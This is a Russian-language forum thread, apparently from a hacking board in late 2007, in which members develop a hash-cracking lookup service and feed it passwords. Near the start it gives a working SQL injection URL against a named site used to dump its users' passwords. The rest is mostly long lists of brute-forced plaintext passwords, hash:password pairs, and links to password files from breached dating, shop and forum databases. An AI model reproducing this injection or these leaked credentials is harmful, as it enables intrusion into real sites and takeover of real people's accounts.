$n=0;
$decode_hash="";
$l=strlen($string)-1;
do
{
$code=ord($string[$n]);
$decode_hash.=dechex($code);
}
while ($n++<$l);
return $decode_hash;
}
ЗЫ Открываются перспективы на экономичное хранение других популярных хэшей (MySQL - char(8) против char(16), MySQL5 - char(20) против char(40), и SHA-1 - char(20) против (40). у всех чарсет 0-9a-f
Кроме того на поле pass я так понял целесообразно использовать тип VARCHAR?
Уникальных паролей добавлено в базу: 12272 неуникальных паролей: 20707 спасибо.
взято от сюда:
http://63.ru/firms/index.php?cmd=show&rubid=-1+union+select+password,2+from+users+limit%2050000/*
mouse.pro
19.12.2007, 12:06
А как добавлять сразу множество? а не по 1-му паролю?
-=lebed=-
19.12.2007, 12:56
А как добавлять сразу множество? а не по 1-му паролю?
http://md5.xek.cc/wlist.php - но щас доступ запрещён, чтоб не нафлудили в базу чего лишнего...
ЗЫ Я щас делаю модернизированный сервис:
Функционал: автоматическое распознавание распространённых хэшей (пока 4: Mysql, Mysql5, md5, sha1) и поиск в базе пароля по любому из них, а так же запрос на популярные онлайн крекеры... ;)
cantrabas
19.12.2007, 16:04
это я ни так делаю или что?
ввожу хеш $1$Q6btAd5d$AzmLvfIjBPEn8PWaT2jKy1
а мне выдает сообщение:Неправильный формат хэш-функции
Эту у тебя хэш не md5
У меня предложение!!!!
Вот у вас на банере написано "Толькое реальные пароли"
предлагаю заменить на "Только чёткие пароли"
это я ни так делаю или что?
ввожу хеш $1$Q6btAd5d$AzmLvfIjBPEn8PWaT2jKy1
а мне выдает сообщение:Неправильный формат хэш-функции
это мд5 уникс
-=lebed= СРОЧНО ОЧИСТЬ СВОЙ ПМ или стукни в асю мне 504863
-=lebed=-
20.12.2007, 15:46
Вобщем обновил двиг на старом хосте: Античат HASH CRACK (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php) прошу затестить!
1. База щас пустая там.
2. Возможности:
а) Автоматическое определение 4-х видов хэшей MySQL, MD5, SHA-1, MySQL5 (точнее 3-х).
б) Поиск по любому из этих хэшей пароля в базе.
в) Запрос пароля на passcracking.ru, если находится добавляется.
г) Ненайденные хэши складываются в базу в соответсвии со своим типом.
д) хэши храняться не ввиде АSCII в таблице, а в бинарном виде, т.е. занимают места в два раза меньше. 8,16,20,20 байт соответсвенно.
To halkfild!
1. Мне нужны пароли с нашего сервиса md5.xek.cc, сдампь из базы пассы в файл плиз, я для обкатки закину на старый хост, будет к пассам подбирать помимо MD5 и SHA1, MySQL, MySQL5 хэши.
2. Далее md5search добавил запрос к нашей базе со своего сервиса, мы не против?
Hi
I added your database (md5.xek.cc) to md5search.org.
Do you not have anything against ? I ask every one because some do not like searching the supplies of the service.
Please answer on the address : massior@gmail.com
Greetz, maSs (md5search.org)
Red_Red1
20.12.2007, 16:19
прошу затестить!
Осталась таже трабла с кавычкой в пароле!!!
Пример:
Добавляем пароль mypas's (8379cf8cc7fcd4730280c7ef056a0b91) Пишет добавлен пароль mypas\'s - спасибо!
Пробуем найти 8379cf8cc7fcd4730280c7ef056a0b91 - не найден :(. поставлен в очередь :)
Пробуем найти e3b77433b94c6c36cfcde03efeee7d77 - находит mypas\'s :)
Но если добавить в базу mypas\'s то на самом деле добавит вот в таком виде mypas\\\'s (662eedb2979d7c2b8491ad3684eba06c)
-=lebed=-
20.12.2007, 16:27
Осталась таже трабла с кавычкой в пароле!!!
Пример:
Добавляем пароль mypas's (8379cf8cc7fcd4730280c7ef056a0b91) Пишет добавлен пароль mypas\'s - спасибо!
Пробуем найти 8379cf8cc7fcd4730280c7ef056a0b91 - не найден :(. поставлен в очередь :)
Пробуем найти e3b77433b94c6c36cfcde03efeee7d77 - находит mypas\'s :)
Но если добавить в базу mypas\'s то на самом деле добавит вот в таком виде mypas\\\'s (662eedb2979d7c2b8491ad3684eba06c)
Ога, вижу пасс попадает в таблицу с символом экранирования, щас подправлю...
Тип хэша определён: MD5
Пароль не найден в нашей базе,
Warning: fsockopen() [function.fsockopen]: unable to connect to passcracking.ru:80 (Connection timed out) in /home/k000716/domains/antichat-md5-crack.bolnoy.com/public_html/cgi-bin/mod.php on line 16
пароль найден на passcracking.ru и добавлен в нашу базу
Так вот...
На passcracking.ru его нет
Red_Red1
20.12.2007, 16:37
Некоректный вывод пароля в поле Пасс, если пароль взят с других сервисов, вот пример:
0ecd320ad7f321d80a4d0483f918e863
В базу записано <i><b><i> с хешем 5d077459f5fd0ef36cc35d0060fa5999
Еще проверил различные комбинации со спецсимволами и их ХТМЛ заменителями. Остались теже проблемы которые я описывал при тесте http://md5.xek.cc/. При этом пароли по разному заносятся в базу в зависимости от того добавляем ли мы пароль или он находится на другом сервисе. Переделайте парсинг паролей, он работает неправильно.... нужно парсить не ХТМЛ код, а то как он отображается при выводе на других сервисах. Удачи!
htnebw
kied
edg-123
de2008
junior76
www.www
halkfild
20.12.2007, 18:56
провели мини совещание с -=lebed=-)))
вообщем данные для дампа я лебедю дал. сделаем дамп всей базы
по поводу проблем с вводом в базу переделаю алгоритм хранения в базе..
вообще после того как закончится весь этот нах с учебой будет очень много переделано и реализовано нового... а пока очень много времени и сил отбирает учеба
з.ы. нас ждут великие дела!
-=lebed=-
21.12.2007, 14:13
Некоректный вывод пароля в поле Пасс, если пароль взят с других сервисов, вот пример:
0ecd320ad7f321d80a4d0483f918e863
В базу записано <i><b><i> с хешем 5d077459f5fd0ef36cc35d0060fa5999
Еще проверил различные комбинации со спецсимволами и их ХТМЛ заменителями. Остались теже проблемы которые я описывал при тесте http://md5.xek.cc/. При этом пароли по разному заносятся в базу в зависимости от того добавляем ли мы пароль или он находится на другом сервисе. Переделайте парсинг паролей, он работает неправильно.... нужно парсить не ХТМЛ код, а то как он отображается при выводе на других сервисах. Удачи!
Профиксены баги с кавычками и спецсиволами в пароле, а так же откоректирован запрос с пасскрэкинга (возвращается пасс, а не http заменители спецсимволов). ЗАТЕСТИТЬ! (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php)
http://md5.xek.cc/wlist.php
хетел добавить расшифрованные пароли так сервер мине вот что ответил You don't have permission to access /wlist.php on this server.
а для чего тогда ссылка ??? если добавлять прав у мну нету !?!?
-=lebed=-
21.12.2007, 18:14
http://md5.xek.cc/wlist.php
хетел добавить расшифрованные пароли так сервер мине вот что ответил
а для чего тогда ссылка ??? если добавлять прав у мну нету !?!?
Ну ввиду того что кто-то сильно нагадил, пока прикрыли для общего доступа...
Ну ввиду того что кто-то сильно нагадил, пока прикрыли для общего доступа...
ну тогда поставте лим на добавление ну там 20 в минуту с одного ip .... а то зря расшифровывал :(
почему база не фильтруется????пароли одни и те же попадаются!
*haris*
12042000
1313013
16121945
2336p
88517570
89190933
CrL!@
Uyen1998
brink87
cat2boat
davis101
drago1111
dy2lan
fable67
fktrcg
free0man
ghbdtnfk
hackerz2k
hallohallohallo
ironic1969
j22232
jacksier
junior76
lovehate3
pizd4
rfcgfhjd
ruslan123
server34
soviet13
thorax1991
tieger67
vitim
despo!
drujba
gnirrabl
lad108
qxevtnu
verdy4ever
halkfild
22.12.2007, 01:09
2grishka:
уникальных паролей добавлено в базу: 26
неуникальных паролей: 7
простых паролей: 0 спасибо.
и
уникальных паролей добавлено в базу: 5
неуникальных паролей: 1
простых паролей: 0 спасибо.
2 159932 кидай пассы сюда или сюда ссылки на фал с расшифроваными.. я или лебедь добавим
я сказал сейчас нет времени нормально сделать.. все будет..
dimon222
22.12.2007, 01:20
ba61d7983c3671383645dd663b786021:82498249
6e3bea210c2bd22382684cb4d42c6cbd:windbane
6ec5fd836d9882414f74105853a6ee26:xelbr
Взял список и побрутил. Добавьте в базу.
На ночь повешу гибрид, ещё кучку набручу.
1q2w3e4r567
82498249
absurfer
ice9mike
lucky2006
moskit11
niambi11
volley415
windbane
Димон!! выкладовай только пароли ;) !
ожидается пополнение)
cantrabas
22.12.2007, 03:19
это мд5 уникс
сервис не расшифровывает такеи хеши?
з.ы. с алгоритмами шифрования я разобрался,всмысле отличить MD5 unix от просто MD5 могу)
вроде нет таких сервисов, и быть не может, как например сальтовые он лайн.
У лебедя надо спросить, от ответит
dimon222
22.12.2007, 11:32
1q2w3e4r567
82498249
absurfer
ice9mike
lucky2006
moskit11
niambi11
volley415
windbane
Димон!! выкладовай только пароли ;) !
ожидается пополнение)
Прошёлся по гибриду, ничего кроме твоего списка ненашёл. :p
Собственно, продолжаем брутить народ!
amf1ch
hncrn4
onlyi12
vjkjljq54
xelbr
ЭДМА
1227859399
322109917
3522275630
orest19
bas199
kotek7
kingsky1
15panda15
ppcamiga
vdsteen1
Chr0n091
coolsoft1
ea6bprowler
bellruby
commondev
dangermine
orest19
bas199
kotek7
kingsky1
15panda15
ppcamiga
vdsteen1
Chr0n091
coolsoft1
ea6bprowler
bellruby
commondev
dangermine
lalelu3332
aa2485
dezember2007
aspire1350
rafi1992
iconmagic
idgoogle
polkaden
styxworld
-=lebed=-
22.12.2007, 20:44
Такс... вообщем посмотрел я дамп базы, выдрал от туда пассы. Очень много не валидных паролей (кто-то нафлудил). Есть предложение написать маску под пароль. Поэтому у меня есть вопрос, какие символы явно не может содержать пароль?
Сейчас заливаю валидные пассы на старый хост, теперь там можно искать помимо MD5 ещё и хэши типов MySQL, Mysql5, SHA-1.
Добавление пассов списком пока недоступно! Пользуйтесь сервисом, пробуйте искать другие хэши на этом сервисе: http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php
1959seth
2bartek2
Nemezida
Oct1946
Scooby1989
arkady123
ghbxelf
paragon1987
polonia1234
simon2241986
Влад15
DDA, откуда пассы взял? я их чёта в хешах не нашёл
с сервиса
от сюда http://md5.xek.cc/noncrack.php
-=lebed=-
24.12.2007, 23:28
1. Все валидные пароли с http://md5.xek.cc/ перенёс в новую базу на http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php
2. Теперь сервис распознаёт тип хэша: MD5(128bit), MySQL(64bit), SHA-1(160bit), MySQL5(160bit).
3. Прикрутил статистику по колличеству общих (валидных запросов) и успешных (на введённый хэш нашёлся пароль в базе или на passcracking.ru).
ЮЗАЕМ ЕГО! Так как он более функционален!
Отписывайтесь о найденных багах сюда.
P.S. Добавление пассов списком пока отключено, так что выкладывайте здесь, я добавлю.
Saint-Sky
24.12.2007, 23:56
-=lebed=-, почему хеш от MySQL5(в хешах на брут) и SHA-1 одинаковые...
Этот хеш - точно не MySQL5 - 19 байт.
-=lebed=-
25.12.2007, 00:25
-=lebed=-, почему хеш от MySQL5(в хешах на брут) и SHA-1 одинаковые...
Этот хеш - точно не MySQL5 - 19 байт.
Виду того, что оба хэша 160bit (20 байт) то распознать их на этапе когда пароль не найден невозможно, поэтому он заносится в два поля. Затем если они когда-нибудь расшифруется (найдётся пароль хоть от одного), в таблицу будет записана правильная инфа (нужный хэш останется, второй выичслится).
Хэш в 19 байт - это что за хэш такой?
ЗЫ И как он вообще туда попал, щас удалю...
arkady123
2bartek2
Oct1946
paragon1987
polonia1234
Scooby1989
1959seth
simon2241986
Влад15
seb1991
ragazzi11
mciltd
solte09
fejflo
elizabetht
liliad
alcaeus
fosteris
niknat
2188524
9826656
sex44
mimsmims
bolek2
kamil01
kiler2
kulka111
mamka1
G@briele
Matrox1976
hellfire1
polska2000
23metsys
damdam11
Guppie1987
memory2b
warp9999
-=lebed=-
25.12.2007, 00:36
arkady123
2bartek2
-----------
warp9999
уникальных паролей добавлено в базу: 37 неуникальных паролей: 0 спасибо.
dimon222
25.12.2007, 01:27
04051992
2188524
3535645
4137724
9826656
Вот чуток.
-=lebed=-
25.12.2007, 01:28
04051992
2188524
3535645
4137724
9826656
Вот чуток.
уникальных паролей добавлено в базу: 3 неуникальных паролей: 2 спасибо.
dimon222
25.12.2007, 08:09
23metsys
G@briele
Guppie1987
Matrox1976
adidas16
bolek2
cq123
damdam11
felix1205
hellfire1
kamil01
kiler2
kulka111
lukasz1987
mamka1
memory2b
mimsmims
polska2000
ragazzi11
rybka15
seb1991
sex44
warp9999
zemsta999
Ещё чуток, гибридом снял.
-=lebed=-
25.12.2007, 09:11
23metsys
G@briele
Guppie1987
------
zemsta999
Ещё чуток, гибридом снял.
уникальных паролей добавлено в базу: 6 неуникальных паролей: 18 спасибо.
dimon222
27.12.2007, 01:19
11635411
1357841
9213619
9772987
Профильтруй список хешей на сайте, а то как не глянешь, то что расшифровывал - осталось.
Ещё чуток гибридом.
19kira01
Eminem101
caracola99
kgarnett24
myxstar
radom1
salosalosalo
sraka2
Ну и ещё чуток снял гибридом. :p
Не пишу сообщение т.к. никто после меня не ответил.
Point55
barsik7
karaoke_78
19kira01
Guppie1987
Point55
ahkclan
aldanek
argorok
barsik7
bpkxsrwc
caracola99
dawidka
deedka
fiurek
gentorac
gwlogin
hercord
ivashca
kremukr
leaoni
loollz
memory2b
myxstar
onekiss
papesata
pdapass
pisjama
qazswx
radom1
ratqenoc
reffejs
rodzynka
salosalosalo
scrvdvv
siemano
song-1
sraka2
tomko12
trzcina
vicmind
vjkjljq54
xraplik
zluizku
zsewgw
ЭДМА
ОБНОВИЛ
оукшсрщ
onekiss
113senha
200apor
adidasler
loollz
tomko12
texascheer
qaz963741
memory2b
forumadmin
ghostrns
maltelol
pdapass
ar0chukwu
haryy111
rowero123
beta1010
192saad
radom1
73895922
k1ngc06
pahmel777
0008best
barsik7
2201marley
coolshine
michal516
anov357
x567qy
dawidka
adminmis
1978m08
marcin1admin
hackmypass
caracola99
skeetr13
mopocket
siemano
gwlogin
aldanek
a009ea73
13835008
n551344
song-1
leaoni
777boys77
sheepworld
zsewgw
gentorac
furkanert
argorok
kamilo11
ahkclan
lidonafta
ebe1447
newpara48
qazswx
podeentrar
herbyburger
aple1211
aldemailru
ChosenGoat
hansolnitro
tawnyhorse
pizda31337
SOSaaa
sraka2
brinshot
copasmata
majorbonnet
riku1616
campoelias
Pavel219
ererpali
pisjama
pawhmamco
jasjan1
231184ml
ivashca
dadix1234
admin_lol
T7789
Point55
klajn123
19kira01
klwern31
ermamerve
224as165
bc881014
wed7988
14mar81
xraplik
myxstar
ucicokyl
Schwenne
hobsebobs
guyltone
10jun75
fiurek
celthon6
roziewski
iglo450
441umni
mpeicool
b8o36b
tbbig6
bmwmihate
reffejs
didi5310
poczta1
poeks1
lbiona007
minprop334
fli9aus1
surfmich1
2luno14
pywam5
Mel730
ratqenoc
627f153
eldamiri
dt97char
cilinsou2
inckloris
1br186k
skopthuk
czajny1
07avtotop
gettofuck
lbr0mley
lenartova
ficoerspe
kor548t
Quedagh
iamador01
lukmas10
!breeg
Ccl225
deedka
meriemhani
gdadmin1224
bopleis6
webgolf10
nk230774
pardoname
big6php
chopreatbo
loryta2001
mankaya90
killprunia
isptzb11
lialcser
4drak23
oricard7
civ321tas
w34gh3
lexissrae
jacecogar
ycsabc123
kszrama123
8ugr17
kjkbnfdbrf
777boy777
rafalek98
k0ngbrink
bluemaxbluemax-*
dimon222
28.12.2007, 14:35
!breeg
0008best
07avtotop
10jun75
113senha
14mar81
192saad
1978m08
1br186k
200apor
2201marley
224as165
231184ml
2luno14
441umni
4drak23
627f153
69459332
777boy777
777boys77
8ugr17
Ccl225
ChosenGoat
Mel730
Pavel219
Quedagh
SOSaaa
Schwenne
T7789
XTOTHEZ
a009ea73
adidasler
admin_lol
adminmis
alcores
aldemailru
anov357
aple1211
ar0chukwu
b8o36b
bartek1996
bc881014
beta1010
big6php
bluemaxbluemax-*
bmwmihate
bopleis6
brinshot
campoelias
carnival66
celthon6
chopreatbo
cilinsou2
civ321tas
coolshine
copasmata
czajny1
dadix1234
danny1957
didi5310
dt97char
ebe1447
edward27
eldamiri
ererpali
ermamerve
ficoerspe
fli9aus1
forumadmin
furkanert
gdadmin1224
gettofuck
ghostrns
guyltone
hackmypass
hansolnitro
haryy111
herbyburger
hobsebobs
iamador01
iglo450
inckloris
isptzb11
jacecogar
jasjan1
k0ngbrink
k1ngc06
kamilo11
killprunia
kjkbnfdbrf
klajn123
klwern31
kor548t
kszrama123
lampard8
lbiona007
lbr0mley
lenartova
lexissrae
lialcser
lidonafta
loryta2001
lukmas10
majorbonnet
maltelol
mankaya90
marcin1admin
meriemhani
michal516
minprop334
mopocket
mpeicool
n551344
newpara48
nk230774
oricard7
pahmel777
pardoname
pawhmamco
piterek10
pizda31337
poczta1
podeentrar
poeks1
pywam5
qaz963741
qween1
rafalek98
riku1616
rowero123
roziewski
sheepworld
skeetr13
skopthuk
surfmich1
tawnyhorse
tbbig6
texascheer
ucicokyl
vita01
w34gh3
webgolf10
wed7988
x567qy
ycsabc123
оукшсрщ
Есть чтото новенькое помимо поста вверху, отсеивать лень было. Sorry(
Ещё
12asdasd
61999916
!breeg
0008best
038823058
07avtotop
106340573
10jun75
113senha
1227859399
12asdasd
14mar81
192saad
1978m08
1br186k
200apor
2201marley
224as165
231184ml
2luno14
3522275630
441umni
4drak23
5410496997
61999916
627f153
69459332
739487487
777boy777
777boys77
8ugr17
914320305
Ccl225
ChosenGoat
Mel730
Moschino
Pavel219
Quedagh
SOSaaa
Schwenne
T7789
XTOTHEZ
a009ea73
adidasler
admin_lol
adminmis
aldemailru
anov357
aple1211
ar0chukwu
b8o36b
bartek1996
bc881014
beta1010
big6php
bluemaxbluemax-*
bmwmihate
bopleis6
bowcow
brinshot
campoelias
carnival66
celthon6
chopreatbo
cilinsou2
civ321tas
coolshine
copasmata
czajny1
dadix1234
danny1957
didi5310
dt97char
ebe1447
edward27
eldamiri
ererpali
ermamerve
ficoerspe
fli9aus1
forumadmin
furkanert
gdadmin1224
gettofuck
ghostrns
guyltone
hackmypass
hansolnitro
haryy111
hebold
herbyburger
hobsebobs
iamador01
iglo450
inckloris
isptzb11
jacecogar
jasjan1
jurhzy
k0ngbrink
k1ngc06
kamilo11
killprunia
kjkbnfdbrf
klajn123
klwern31
kor548t
kszrama123
lampard8
lbiona007
lbr0mley
lenartova
lexissrae
lialcser
lidonafta
loryta2001
lukmas10
majorbonnet
maltelol
mankaya90
marcin1admin
masras
meriemhani
michal516
minprop334
mopocket
mpeicool
n551344
newpara48
nk230774
opole1
oricard7
pahmel777
pardoname
pawhmamco
pcwlive
piterek10
pizda31337
poczta1
podeentrar
poeks1
pywam5
qaz963741
qween1
rafalek98
rehfrcf
riku1616
rowero123
roziewski
sheepworld
sintija
skeetr13
surfmich1
tawnyhorse
tbbig6
texascheer
ucicokyl
vita01
w34gh3
webgolf10
wed7988
x567qy
ycsabc123
оукшсрщ
[Paran0ik]
29.12.2007, 00:54
не распознал mysql хеши =\
halkfild
29.12.2007, 01:18
выражаю благодарность grishka
уникальных паролей добавлено в базу: 162
неуникальных паролей: 0
простых паролей: 0 спасибо.
продолжайте в том же духе..
dimon222
29.12.2007, 15:06
выражаю благодарность grishka
продолжайте в том же духе..
Глянуть на страницу назад тяжко? Там чувак перед моим сообщением расшифровал всё это. :mad:
Next
11061987
3072807
alcores
tjavg
-=lebed=-
29.12.2007, 15:12
Пояснение: так как реально сейчас сервиса два, новый и старый, то
Я занимаюсь страрым (который функциональнее + MySQL,MySQL5,SHA-1 хэши) и добавляю пассы туда.
А halkfild новым сервисом и добавляет пассы туда.
-=lebed=-, а что если сделать такую фишечку, типа поле туда можно вписывать хешей 10-50 и он по ним смотрит, а то парой по одному долго выходит
-=lebed=-
29.12.2007, 16:12
-=lebed=-, а что если сделать такую фишечку, типа поле туда можно вписывать хешей 10-50 и он по ним смотрит, а то парой по одному долго выходит
Нагрузка на сервер, на мускул...
Взлом паролей - это плохо.
Это сайт по Восстановлению Ваших Паролей. :D
dimon222
29.12.2007, 16:30
Нагрузка на сервер, на мускул...
Взлом паролей - это плохо.
Это сайт по Восстановлению Ваших Паролей. :D
Блин, забыл пароль. Помню только его хеш. :D
Обновлено.
Nick1981
alcores
getstoned
golf52007
jas3454
webra
103010301030
1tempass
Glenans23
Nick1981
Tropico18
golf52007
hello
iskra77
jesica22
mantaan
powerpc
student
webra
dimon222
30.12.2007, 11:27
103010301030
1tempass
2008Internet
Glenans23
Tropico18
actor2002
domek107
henk1976
iskra77
jesica22
m3tallica
mantaan
patryk13
werta1
zaqxsw12
-=lebed=-
30.12.2007, 11:35
уникальных паролей добавлено в базу: 20 неуникальных паролей: 14 спасибо. ( c 3-х постов выше)
C1627A
Q1w2e3r4T
masras
bowcow
jurhzy
739487487
opole1
alcores
zxc4aml
rustermoon1
szpaner
760970cc
alcospeway
gbk1309
pcwlive
sebaqler
danny1957
leeryan1983
sidcore350
thw2809
edward27
danrome07
jimdigriz
kedvesem
sintija
ikidihee
hebold
piterek10
038823058
potkulcs
lampard8
61999916
qween1
Moschino
106340573
007480rl
b04021985
cdaregna
sskw7meo
asd321as
69459332
himedit716
pawrowska
Jsic2d
csaliba78
bartek1996
sivkovanata
mouwes23
sa2112s41
887hrnit
cryfate2
rychu788
appda1731
trilogik
INnino01
gaya12561
SLurfpak
puddypig
davidovic2
peer2mail
dzau1945
wwwpdaby
12asdasd
halkfild
31.12.2007, 03:48
маленькое полу тестовое нововведение..
самие активные брутельщики с нашего списка будут получать номерки ICQ comp.
спасибо за ваше внимание к нашему сервису.
*примечание
не нужно только флудить.. все будет просматриватся руками. /*это временный этап в январе доделаем*/
dimon222
31.12.2007, 03:55
маленькое полу тестовое нововведение..
самие активные брутельщики с нашего списка будут получать номерки ICQ comp.
спасибо за ваше внимание к нашему сервису.
*примечание
не нужно только флудить.. все будет просматриватся руками. /*это временный этап в январе доделаем*/
Круто, будем стараться. ;)
Собстно мой маленький списочек сбрученный по словарям...
Ща ещё на ночь гибрид пускаю. :cool:
103010301030
17950302
197346825
1tempass
2008Internet
70031350
Glenans23
Nick1981
Tropico18
actor2002
domek107
getstoned
golf52007
henk1976
iddqd666
iskra77
jas3454
jesica22
julese
m3tallica
mantaan
patryk13
tnnka
werta1
zaqxsw12
Если пароли повторяются, я хз... Я удаляю хешы и обновляю список теми что содержаться на сайте...
Next, обновление.
12624106
77merlin77
Mar1a
aktakaktak
b00kend
calimali
deleon1
f23982
gbhju7
kocham21
ouch22
qawsed92
rafcio1994
sasadas
vulcan60
xx221958
Next, обновление.
LoveLove
marcin102
musicmusic
ocococ
swamps2000
t0ttenham
yfafyz24
Next, обновление.
1satriani1
9eh31m
ale1980
fightclub69
herbie01
inside01
katie2002
laura1981
m0lh0
redlight28
rubber99
sepoms
siemensc65
skyblue1987
snoochi3
dimon222
02.01.2008, 11:07
Обновил!
247962112
553235309
halil1975
katie2002
m0lh0
marcin102
swamps2000
t0ttenham
yfafyz24
Вот, может пригодится http://slil.ru/25310546
33258 паролей. Пароли из дампа базы сайта знакомств
гружу в базу, потом скажу результат...
Покопался в архивах:
kay4yk:57a6cb7f125781bbc32a8a1ace960bac
white1k:47b7b6cf95dbb80aed26d620631c45f6
mik@89:bf7e194de8c3a55b36ea2ff111eef9a9
cektant:103bd89be52904eeb0d4cf8774622420
kydryavyi:3f226faa9ce620a49bc0d6937aa2d6e4
moskva477:a8db63fe39aa7cf23278ee9a9863c158
dashasyka:711e91fc5251b37102acf0aff67469ee
planetarii:688de0e8ef4313f457c70ea2ba18874e
xxx1988:3617f3af99349cabed67b8e60b1b316f
kishkish2:d1c6d9e5305853859936190b770089dd
scorpionz:e9306a72e3f314926925492b58a9af58
qfrhtdtlrj:db49cc9b0aade8b0e1e5fdeff619f59e
[eqdfv:3d97565b13a0031619bb51aa395b29c6
-=lebed=-
02.01.2008, 20:54
эт чё?
Уже добавил (это пасс:мд5 хэш..)
я думал - ник : мд5 , думал что разделом ошибся
1480376
148037
once2000
fenderok
lukang
kossoi89
thekill
30stm
cobynba
sterva111
beckham7
s10n
puzodon
dontspeak
avril1987
quartzclock
digsdigs
aladinmn4
ussr91
ovadokidavro
gold007
manckubus
preygame
da_ha
painrage
crazy85
petek0
tommozly
justfun
el1ga
h0rses
fucksummer
babyhase
484940
greenelf
vladik2000
А вот еще
http://elterripperd.onep.ru/hesh-pass.txt
Пароли из дампа базы сайта любителей Тойоты если не ошибаюсь. 3220 записей формата хеш;пароль
Вот, может пригодится http://slil.ru/25310546
33258 паролей. Пароли из дампа базы сайта знакомств
уникальных паролей добавлено в базу: 8379 неуникальных паролей: 24879 спасибо.
-=lebed=-
02.01.2008, 21:48
В нашей базе теперь 185215 записей! (http://antichat-md5-crack.bolnoy.com/cgi-bin/index.php) +35k
А вот еще
http://elterripperd.onep.ru/hesh-pass.txt
Пароли из дампа базы сайта любителей Тойоты если не ошибаюсь. 3220 записей формата хеш;пароль
уникальных паролей добавлено в базу: 52 неуникальных паролей: 3168 спасибо.
1480376
19780914
247962112
4seeds
553235309
9admin9
9eh31m
Kaena01
SlipKnoT99
ale1980
basu91
czarny1
dudexok
fightclub69
hailey07
herbie01
inside01
kam1991
karamba12
katie2002
kfdjxrf
kic777
kishkish2
laura1981
m0lh0
nik4o
recordphone
rubber99
s10n
scorpionz
sepoms
smaypass
solisek
thekill
tombak31
webcait
white1k
xxx1988
-=lebed=-
03.01.2008, 00:32
Уря! В нашей базе 200660 паролей! реальных...
1satriani1
<>1234
agonia2000
cerca123456
cico74
darcin82
hauta11
hot*fix
kris88
maxior
pchela
redlight28
remesl
Хацкер
ygmyerrs
Добавил
thekill
nik4o
Ublud
recordphone
webcait
herbie01
sepoms
m0lh0
nightelf
4seeds
6216bc
9ede5a
9eh31m
D8Hap2
GRpTAv
RN3QKE
RX9aef
VaNgOg
YXI222
ZOJA54
ah1433
basu91
cdd4af
cico74
eG5UyE
ep9912
fb5c9f
ffh218
gkssas
jb1003
kaiore
kic777
kris88
maxior
n64rlZ
naja5a
nortur
pchela
remesl
sepoms
sp180i
1andruxa1
1satriani1
9admin9
<>1234
agonia2000
ale1980
amixorpa
bully9964
cerca123456
czarny1
darcin82
fightclub69
gimnazjum17
hailey07
hauta11
inside01
jajeczko123
kam1991
karamba12
katie2002
laura1981
lipton6
lrobin6
neodude66
optymalizacja2
redlight28
rubber99
saskaa123456
sidorskiy28
siemensc65
skyblue1987
sprockets1976
takutu2
tombak31
veki1234
xxx1988
У меня чесно говоря возник вопрос, к какому виду причеслять наш сервис? Когда я проверяю хеш, то приходится ждать , и бывает не мало...
http://elterripperd.onep.ru/res.txt
2266 паролей из базы забугорного интернет-магазина
http://elterripperd.onep.ru/res_3.txt
597 паролей из дампа базы немецкого магазинчика сувениров
http://elterripperd.onep.ru/res_2.txt
337 паролей из баз разных ресурсов
halkfild
05.01.2008, 01:52
пассы простые но добавил. спс
уникальных паролей добавлено в базу: 133
неуникальных паролей: 51
простых паролей: 59 спасибо.
уникальных паролей добавлено в базу: 94
неуникальных паролей: 39
простых паролей: 48 спасибо.
уникальных паролей добавлено в базу: 87
уникальных паролей добавлено в базу: 131
неуникальных паролей: 64
простых паролей: 142 спасибо.
Вот насобирал за сегодня
http://elterripperd.onep.ru/res_4.txt
17952 пароля из баз разных форумов, магазинов и тд.
добавлю
уникальных паролей добавлено в базу: 692 неуникальных паролей: 17260 спасибо.
01068796
05021979
0733700
09121954
12345tanja
123__123
13081982
132fly
1480376
14921980
2150482
247962112
25319011
2611976
2848688
29051949
32system
5114467
5524206
553235309
56605660
5902224
6351226
6549834
7013694
7719680
789512387
824126005
87417183
Buffy121
Kaena01
Pinguin123
Thomi77
VISTAVISTA
abkbobcj
ahojda
alqadri
basser5
bcnbyfz
bgbest
bivka
dasada
demonius
djdrf777
emercom
fmck
gbvtyjd
herthabsc
igor1982
iliaaa
iloveddt
ilovewomen
irina-laden
irulka
kamilek123
kdezp
kfdjxrf
kishkish2
kolko1
kozi12
lbownz
lobster24
lordthe
majdos
mannna
maralin
marzena7
masterek
mati07
matwoz
megane14
miterra
mj1263
nato22
nika14
ntsecofr
pediatru
pendoor13
pescara2
pjort20
podapl
polki1
pr0p4n3
q121212
qazqwert
qwert202
robuna
rusalochka
scorpionz
sexer1
skrecz
snoochi3
testhb
torrrn
ultras6
vakero
vinner1
vrginx
warenn
white1k
wolhei
zergen
Сори если написал не втой теме но чё в очереди на расшифровку делает ета шняга 22222222222222222222222222222222
11111111111111111111111111111111
39393833383538393931413143313831
babacababacababacababacababaca24
не машалобы какую нибудь автоматическую проверку сделать чтоб перед тем как его в базу на расшифровку кидало проверило сначало на подлинность
-=lebed=-
06.01.2008, 11:12
Сори если написал не втой теме но чё в очереди на расшифровку делает ета шняга 22222222222222222222222222222222
11111111111111111111111111111111
39393833383538393931413143313831
babacababacababacababacababaca24
не машалобы какую нибудь автоматическую проверку сделать чтоб перед тем как его в базу на расшифровку кидало проверило сначало на подлинность
А в чём дело - это "обычные" md5 хэши, это для тебя у него вид определённо красивый. С точки зрения алгоритма и компьютера 128-битовое число записанное в hex как 11111111111111111111111111111111 такое же число как и любое другое. Дык как ты предлагаешь определять подлинность хэша? = отсутствие какой либо закономерности? Их очень может быть много - например зеркальный, 0123456789abcdeffedcba9876543210, 12341234123412341234123412341234 - повторение групп цифр и др. Поиск всех возможных визуальных красивостей (закономерностей) - задача визуального распознавания (для искуств. интелекта) ведь к примеру сочетание цифр 69 красиво - симетрично относительно центра... Или есть конкретная матем. формула что есть "подлинный хэш" ?
P.S. Хэш может получиться любой из [0-9a-f]{32} это ведь просто 16-байтовое целое число...
1194998153
1199551473
1414058814
1504120176
1565236971
17731986
4508012
55091429
6311257
6620081
7753191
8053977302
9031982
9056214459
9642453936
Cbufhtns001
amok77
asdqwe12345
big6cl
dibi666
drummer159
emcio21
f1ckd1ch
В списке на http://antichat-md5-crack.bolnoy.com/cgi-bin/noncrack_md5.php есть по крайней мере 4 хеша уже имеющихся в вашей базе вот они:
3c3ec3259487d423405de34c538f1625:mmrtm30
daf81449b273c03242da8e2944498490:td2249
7c30cf8313e5259d28801bbf78fe1baf:trebor3
9843a25b198eb2429d48e74dfc1a7d48:25318991
